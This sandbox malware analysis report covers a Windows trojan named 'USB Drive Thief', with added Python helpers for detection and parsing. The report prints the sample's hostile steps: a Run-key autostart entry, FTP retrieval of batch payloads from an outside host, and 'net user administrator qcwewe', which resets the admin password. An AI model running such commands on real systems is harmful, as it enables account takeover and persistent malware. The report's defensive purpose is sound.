Analysis Date: 2015-10-19 14:03:40
MD5: 13debfac08b82de13a04e74ed21665e2
SHA1: 97e1b9039278ffbd4d2ec1cc9590837b2f8d01a7

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 5a8fabd47a118a20b9682e471ec4c399 sha1: 8a7133eca02e2bc08ac7ab4fd66d5f1118e6aba0 size: 561152
Section .rdata: md5: 8b205a1ad972f598fed1bc4b791c1b26 sha1: c96d5a5d09a37fe4b49a5c89aa51d0da439b2c36 size: 159744
Section .data: md5: db28e1c54795441bed5af9d98d59f0f5 sha1: 0076f0afa59620e01fecd90c8cfe50b06d0d1b5b size: 90112
Section .rsrc: md5: f104b51d49c68a24f0ece28499a6dc5b sha1: 3575eab0aa9241c055992057844e4f29e8dec574 size: 45056
Timestamp: 2010-10-20 12:10:01
Version LegalCopyright: 作者:小刀 版权所有 (Author: 小刀, all rights reserved)
FileVersion: 1.0.0.0
CompanyName: 作者:小刀 (Author: 小刀)
Comments: 本程序使用易语言编写(http://www.eyuyan.com) (This program was written in 易语言, EPL / Easy Programming Language)
ProductName: U盘小偷 ("USB Drive Thief")
ProductVersion: 1.0.0.0
FileDescription: 江中小刀工作室 (江中小刀 Studio)
Packer: Microsoft Visual C++ v6.0
(Signature match only. EPL-compiled executables are routinely identified as MSVC 6.0 by PEiD-style compiler signatures because the EPL runtime is built and linked with the VC6 toolchain, so the Comments field above is the better indicator of how this sample was produced.)
PEhash: 37b87824512fb711c685d58dae8cf8a9b109011a
IMPhash: f0589be27c78bbc889e6c4a614203768
AV CA (E-Trust Ino): no_virus
AV F-Secure: Trojan:W32/DelfInject.R
AV Dr. Web: Trojan.DownLoader5.26440
AV ClamAV: no_virus
AV Arcabit (arcavir): no_virus
AV BullGuard: no_virus
AV Padvish: no_virus
AV VirusBlokAda (vba32): TrojanPSW.Bjlog
AV CAT (quickheal): TrojanPSW.Bjlog.r4
AV Trend Micro: no_virus
AV Kaspersky: no_virus
AV Zillya!: Trojan.Bjlog.Win32.9157
AV Emsisoft: no_virus
AV Ikarus: Trojan.Offend
AV Frisk (f-prot): W32/Agent.EW.gen!Eldorado
AV Authentium: W32/Agent.EW.gen!Eldorado
AV MalwareBytes: no_virus
AV MicroWorld (escan): no_virus
AV Microsoft Security Essentials: no_virus
AV K7: Backdoor ( 04c511bf1 )
AV BitDefender: no_virus
AV Fortinet: W32/Bjlog.BJBO!tr.pws
AV Symantec: no_virus
AV Grisoft (avg): PSW.OnlineGames3.CGIN
AV Eset (nod32): no_virus
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Ad-Aware: no_virus
AV Twister: Trojan.D3DB75A7CA69EC0D
AV Avira (antivir): TR/Offend.kdv.397313
AV Mcafee: no_virus
AV Rising: Trojan.Win32.Generic.12A0A678
(15 of the 31 engines listed flag the sample; the named families cluster on Bjlog / PSW (password stealer), DownLoader and Offend, with several of the remaining hits being generic or heuristic names.)

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\Run\\\xce\\xd2\\xb5\\xc4\\xc6\\xf4\\xb6\\xaf\\xcf\\xee ➝ c:\windows\system\2.bat\\x00
(The value name is a GBK string that the sandbox rendered as escaped bytes; it decodes to 我的启动项, "My startup item". The trailing \x00 is the string terminator. This is a per-user autostart entry pointing at the downloaded 2.bat, which the sample deletes later in the run, so at next logon the entry points at a missing file unless it is written again.)
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\logo[1].gif
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\2345[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012015101920151020\index.dat
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates File: c:\windows\system\fff.bat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: c:\windows\system\2.bat
Creates File: \Device\Afd\Endpoint
Creates File: c:\autoexec.BAT
Deletes File: c:\windows\system\fff.bat
Deletes File: c:\windows\system\2.bat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\index.dat
Deletes File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\index.dat
Creates Process: c:\autoexec.BAT
Creates Mutex: _!SHMSFTHISTORY!_
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!mshist012015101920151020!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: www.2345.com
(The Temporary Internet Files, History.IE5 and Cookies index.dat entries, the \Device\Afd\* objects and the WinINet/history mutexes are side effects of fetching the two www.2345.com URLs through WinINet, not behaviour specific to this sample. The sample-specific artifacts in this process are the two batch files written to c:\windows\system (the files retrieved over FTP in the Network Details), c:\autoexec.BAT written to the drive root and then executed, and the Run-key entry above.)
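An added example, not part of the sandbox report or the sample's own code: a Python helper that turns a Registry line of the form above back into key path, value name and data, rebuilding the bytes from the sandbox's \\xNN rendering. The decode assumes the strings are GBK (Windows code page 936), which is consistent with the Simplified Chinese version info; the escape layout matched by the regex is likewise an assumption about this report's format. Run and RunOnce keys are flagged as autostart persistence. The constant REG_LINE is the persistence line copied from this report.

```python
import re
from typing import Dict

# Constructed input: the Run-key persistence line copied from the Runtime Details
# above. The sandbox rendered the non-ASCII value name and the trailing NUL as
# \\xNN escapes, so the line is handled here as that escaped text.
REG_LINE = (
    r"HKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\Run"
    r"\\\xce\\xd2\\xb5\\xc4\\xc6\\xf4\\xb6\\xaf\\xcf\\xee"
    r" ➝ c:\windows\system\2.bat\\x00"
)

# One sandbox escape: two literal backslashes, 'x', two hex digits (assumed format).
ESC = re.compile(r"\\\\x([0-9a-fA-F]{2})")
# A run of such escapes at the end of the key part is the value name rendered as bytes.
ESC_RUN_AT_END = re.compile(r"(?:\\\\x[0-9a-fA-F]{2})+$")
PERSISTENCE_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")


def unescape(text: str, codepage: str = "gbk") -> str:
    """Rebuild the original bytes from the escaped rendering and decode them.

    The code page is an assumption: the sample's version info is Simplified
    Chinese, so ANSI strings from it are decoded as GBK (code page 936).
    Trailing NULs are string terminators, not part of the value.
    """
    buf = bytearray()
    i = 0
    while i < len(text):
        m = ESC.match(text, i)
        if m:
            buf.append(int(m.group(1), 16))
            i = m.end()
        else:
            buf += text[i].encode(codepage)
            i += 1
    return buf.decode(codepage).rstrip("\x00")


def parse_registry_line(line: str, codepage: str = "gbk") -> Dict[str, object]:
    """Split 'KEY\\VALUE ➝ DATA' into key path, value name and data; flag autostart keys."""
    key_part, _, data_part = line.partition(" ➝ ")
    m = ESC_RUN_AT_END.search(key_part)
    if m:                       # value name was rendered as raw bytes
        key_path = key_part[: m.start()].rstrip("\\")
        value_raw = m.group(0)
    else:                       # plain ASCII value name
        key_path, _, value_raw = key_part.rpartition("\\")
    return {
        "key": key_path,
        "value": unescape(value_raw, codepage),
        "data": unescape(data_part, codepage),
        "persistence": key_path.lower().endswith(PERSISTENCE_KEYS),
    }


if __name__ == "__main__":
    entry = parse_registry_line(REG_LINE)
    print(entry["value"], "->", entry["data"], "persistence:", entry["persistence"])
```

On the line above this yields the value name 我的启动项 with data c:\windows\system\2.bat and persistence set; on the ProxyBypass line it yields a plain ASCII value with persistence unset. If the decoded text comes out as mojibake, the code page assumption is wrong and should be changed to match the sample's locale rather than the analysis host's.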

Process
↳ c:\autoexec.BAT

Creates Process: net user administrator qcwewe
(Sets the password of the built-in local Administrator account to "qcwewe". The sample already runs as Administrator in this sandbox, so no further privilege is needed. net.exe hands the user subcommand to net1.exe, which is why the same command line appears twice below.)

Process
↳ net user administrator qcwewe

Creates Process: net1 user administrator qcwewe

Process
↳ net1 user administrator qcwewe

Creates File: PIPE\samr
Creates File: PIPE\lsarpc
(The SAMR and LSARPC named-pipe opens are the RPC connections net1.exe uses to write the new password into the local SAM.)
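An added detection example, not from the report: Python run over constructed process-creation events that mirror the tree above (the event field names are an assumption modelled on Sysmon Event ID 1 / EDR telemetry; the sandbox itself only reports parent and child command lines). It interprets net / net1 user command lines, collapses the net.exe to net1.exe hand-off into a single finding, and tags a password change on the built-in Administrator that was launched from a batch file.

```python
from typing import Dict, List, Optional

# Constructed process-creation events reconstructed from the process tree above.
# Field names are an assumption modelled on Sysmon Event ID 1; the sandbox
# reports the .bat as the process image, so it is kept that way here.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "C:\\malware.exe",  "cmdline": "C:\\malware.exe"},
    {"pid": 101, "ppid": 100, "image": "c:\\autoexec.BAT", "cmdline": "c:\\autoexec.BAT"},
    {"pid": 102, "ppid": 101, "image": "net.exe",          "cmdline": "net user administrator qcwewe"},
    {"pid": 103, "ppid": 102, "image": "net1.exe",         "cmdline": "net1 user administrator qcwewe"},
]

NET_IMAGES = {"net", "net.exe", "net1", "net1.exe"}
SCRIPT_SUFFIXES = (".bat", ".cmd", ".vbs", ".js", ".ps1")


def classify_net_user(cmdline: str) -> Optional[Dict[str, Optional[str]]]:
    """Interpret a 'net user ...' command line; None when it is not one."""
    toks = cmdline.split()
    if len(toks) < 2:
        return None
    exe = toks[0].strip('"').lower().rsplit("\\", 1)[-1]
    if exe not in NET_IMAGES or toks[1].lower() != "user":
        return None
    switches = {t.lower().split(":")[0] for t in toks[2:] if t.startswith("/")}
    positional = [t for t in toks[2:] if not t.startswith("/")]
    if not positional:                      # bare "net user" only lists accounts
        return None
    if "/add" in switches:
        action = "account_created"
    elif "/delete" in switches or "/del" in switches:
        action = "account_deleted"
    elif len(positional) >= 2:              # "net user NAME PASSWORD" or "NAME *"
        action = "password_changed"
    else:
        action = "account_queried"          # "net user NAME" prints details
    return {
        "account": positional[0],
        "action": action,
        "password": positional[1] if len(positional) >= 2 else None,
    }


def _ancestry(by_pid: Dict[int, dict], pid: int) -> List[str]:
    """Image names from the root of the recorded tree down to pid."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def find_account_changes(events: List[dict]) -> List[dict]:
    """Report net user account/password changes once per logical action.

    net.exe forwards 'user' commands to net1.exe with the same arguments, so
    both appear in telemetry; a child whose parent already carries the same
    classification is treated as the hand-off and skipped.
    """
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        hit = classify_net_user(e["cmdline"])
        if hit is None or hit["action"] == "account_queried":
            continue
        parent = by_pid.get(e["ppid"])
        if parent and classify_net_user(parent["cmdline"]) == hit:
            continue                        # net.exe -> net1.exe duplicate
        chain = _ancestry(by_pid, e["pid"])
        findings.append({
            **hit,
            "builtin_admin": hit["account"].lower() == "administrator",
            "from_script": any(img.lower().endswith(SCRIPT_SUFFIXES) for img in chain),
            "chain": chain,
        })
    return findings


if __name__ == "__main__":
    for f in find_account_changes(EVENTS):
        print(f)
```

On the events above this produces one finding: password_changed for administrator with password qcwewe, builtin_admin and from_script both true, and the chain C:\malware.exe > c:\autoexec.BAT > net.exe. Keying on both net.exe and net1.exe matters because an attacker can call net1.exe directly and skip the net.exe parent entirely.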

Network Details:

DNS: www.2345.com
Type: A
42.62.30.180
HTTP GET: http://www.2345.com/?6225
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.2345.com/logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1034 ➝ 204.45.67.3:21
Flows TCP: 192.168.1.1:1034 ➝ 204.45.67.3:21
Flows TCP: 192.168.1.1:1040 ➝ 42.62.30.180:80
Flows TCP: 192.168.1.1:1041 ➝ 42.62.30.180:80
(The port-21 flow is the FTP session in the Raw Pcap below: a plaintext login as USER 9576 / PASS 123456 followed by RETR 2.bat and RETR fff.bat, which matches the two batch files written to c:\windows\system. The flow table only lists the control channel; the active-mode data connections the PORT commands request are not shown. The User-Agent on the two HTTP requests is the stock WinINet string for IE6 on Windows XP, i.e. the sandbox's own, not one set by the sample.)

Raw Pcap (three client-side streams: the HTTP GET /?6225 to www.2345.com, the FTP control channel to 204.45.67.3:21, and the HTTP GET /logo.gif; only the client's side of each is shown, no server replies)
0x00000000 (00000)   47455420 2f3f3632 32352048 5454502f   GET /?6225 HTTP/
0x00000010 (00016)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000020 (00032)   0d0a4163 63657074 2d4c616e 67756167   ..Accept-Languag
0x00000030 (00048)   653a2065 6e2d7573 0d0a4163 63657074   e: en-us..Accept
0x00000040 (00064)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000050 (00080)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000a0 (00160)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000b0 (00176)   290d0a48 6f73743a 20777777 2e323334   )..Host: www.234
0x000000c0 (00192)   352e636f 6d0d0a43 6f6e6e65 6374696f   5.com..Connectio
0x000000d0 (00208)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x000000e0 (00224)   0a                                    .

0x00000000 (00000)   55534552 20393537 360d0a50 41535320   USER 9576..PASS 
0x00000010 (00016)   31323334 35360d0a 54595045 20490d0a   123456..TYPE I..
0x00000020 (00032)   504f5254 20313932 2c313638 2c34322c   PORT 192,168,42,
0x00000030 (00048)   312c3139 2c313337 0d0a5349 5a452032   1,19,137..SIZE 2
0x00000040 (00064)   2e626174 0d0a5245 54522032 2e626174   .bat..RETR 2.bat
0x00000050 (00080)   0d0a5459 50452049 0d0a504f 52542031   ..TYPE I..PORT 1
0x00000060 (00096)   39322c31 36382c34 322c312c 342c3134   92,168,42,1,4,14
0x00000070 (00112)   0d0a5349 5a452066 66662e62 61740d0a   ..SIZE fff.bat..
0x00000080 (00128)   52455452 20666666 2e626174 0d0a       RETR fff.bat..

0x00000000 (00000)   47455420 2f6c6f67 6f2e6769 66204854   GET /logo.gif HT
0x00000010 (00016)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000020 (00032)   2a2f2a0d 0a526566 65726572 3a206874   */*..Referer: ht
0x00000030 (00048)   74703a2f 2f777777 2e323334 352e636f   tp://www.2345.co
0x00000040 (00064)   6d2f3f36 3232350d 0a416363 6570742d   m/?6225..Accept-
0x00000050 (00080)   4c616e67 75616765 3a20656e 2d75730d   Language: en-us.
0x00000060 (00096)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000070 (00112)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000080 (00128)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000090 (00144)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x000000a0 (00160)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x000000b0 (00176)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x000000c0 (00192)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000d0 (00208)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000e0 (00224)   7777772e 32333435 2e636f6d 0d0a436f   www.2345.com..Co
0x000000f0 (00240)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x00000100 (00256)   6c697665 0d0a0d0a                     live....
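An added example, not part of the report: Python that reassembles bytes from the sandbox's hexdump layout and summarises the client side of the FTP control channel, extracting the plaintext credentials, the retrieved file names and the PORT endpoints (active mode: the client asks the server to connect back to h1.h2.h3.h4 on port p1*256+p2). The FTP_DUMP text is the second dump above copied verbatim; the regex describing the line layout is an assumption about this report's format.

```python
import re
from typing import Dict, Tuple

# Constructed input: the FTP control-channel dump copied from the Raw Pcap above.
FTP_DUMP = """\
0x00000000 (00000)   55534552 20393537 360d0a50 41535320   USER 9576..PASS
0x00000010 (00016)   31323334 35360d0a 54595045 20490d0a   123456..TYPE I..
0x00000020 (00032)   504f5254 20313932 2c313638 2c34322c   PORT 192,168,42,
0x00000030 (00048)   312c3139 2c313337 0d0a5349 5a452032   1,19,137..SIZE 2
0x00000040 (00064)   2e626174 0d0a5245 54522032 2e626174   .bat..RETR 2.bat
0x00000050 (00080)   0d0a5459 50452049 0d0a504f 52542031   ..TYPE I..PORT 1
0x00000060 (00096)   39322c31 36382c34 322c312c 342c3134   92,168,42,1,4,14
0x00000070 (00112)   0d0a5349 5a452066 66662e62 61740d0a   ..SIZE fff.bat..
0x00000080 (00128)   52455452 20666666 2e626174 0d0a       RETR fff.bat..
"""

# One dump line (assumed layout): hex offset, decimal offset in parentheses, up to
# four groups of hex bytes separated by single spaces, then a wider gap and the
# ASCII view. The ASCII column is never consulted, so it cannot corrupt the bytes.
HEX_LINE = re.compile(
    r"^0x[0-9a-fA-F]+\s+\(\d+\)\s+"
    r"(?P<hex>[0-9a-fA-F]{2,8}(?: [0-9a-fA-F]{2,8}){0,3})"
)


def hexdump_to_bytes(dump: str) -> bytes:
    """Reassemble the raw stream from the sandbox's hexdump rendering."""
    out = bytearray()
    for line in dump.splitlines():
        m = HEX_LINE.match(line)
        if m:
            out += bytes.fromhex(m.group("hex").replace(" ", ""))
    return bytes(out)


def parse_port(arg: str) -> Tuple[str, int]:
    """Decode an FTP PORT argument h1,h2,h3,h4,p1,p2 into (ip, p1*256+p2)."""
    nums = [int(p) for p in arg.split(",")]
    if len(nums) != 6 or any(not 0 <= n <= 255 for n in nums):
        raise ValueError(f"malformed PORT argument: {arg!r}")
    return ".".join(map(str, nums[:4])), nums[4] * 256 + nums[5]


def summarize_ftp_client(stream: bytes) -> Dict[str, object]:
    """Pull credentials, transfers and data-channel endpoints out of the client side."""
    summary: Dict[str, object] = {
        "user": None, "password": None, "retrieved": [], "data_endpoints": [], "commands": [],
    }
    # FTP commands are ASCII lines terminated by CRLF; latin-1 keeps odd bytes intact.
    for line in stream.decode("latin-1").split("\r\n"):
        if not line:
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        summary["commands"].append(verb)
        if verb == "USER":
            summary["user"] = arg
        elif verb == "PASS":
            summary["password"] = arg
        elif verb == "RETR":
            summary["retrieved"].append(arg)
        elif verb == "PORT":
            summary["data_endpoints"].append(parse_port(arg))
    return summary


if __name__ == "__main__":
    print(summarize_ftp_client(hexdump_to_bytes(FTP_DUMP)))
```

Run on the dump this returns user 9576, password 123456, retrievals 2.bat and fff.bat, and data endpoints 192.168.42.1:5001 and 192.168.42.1:1038. Two things worth noticing: the credentials cross the wire in the clear on port 21, so they are usable as a network indicator as-is, and the address in the PORT commands (192.168.42.1) is not the 192.168.1.1 the flow table reports for the same session; the report does not explain the mismatch, so correlate on the flow table rather than on the PORT payload.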


Strings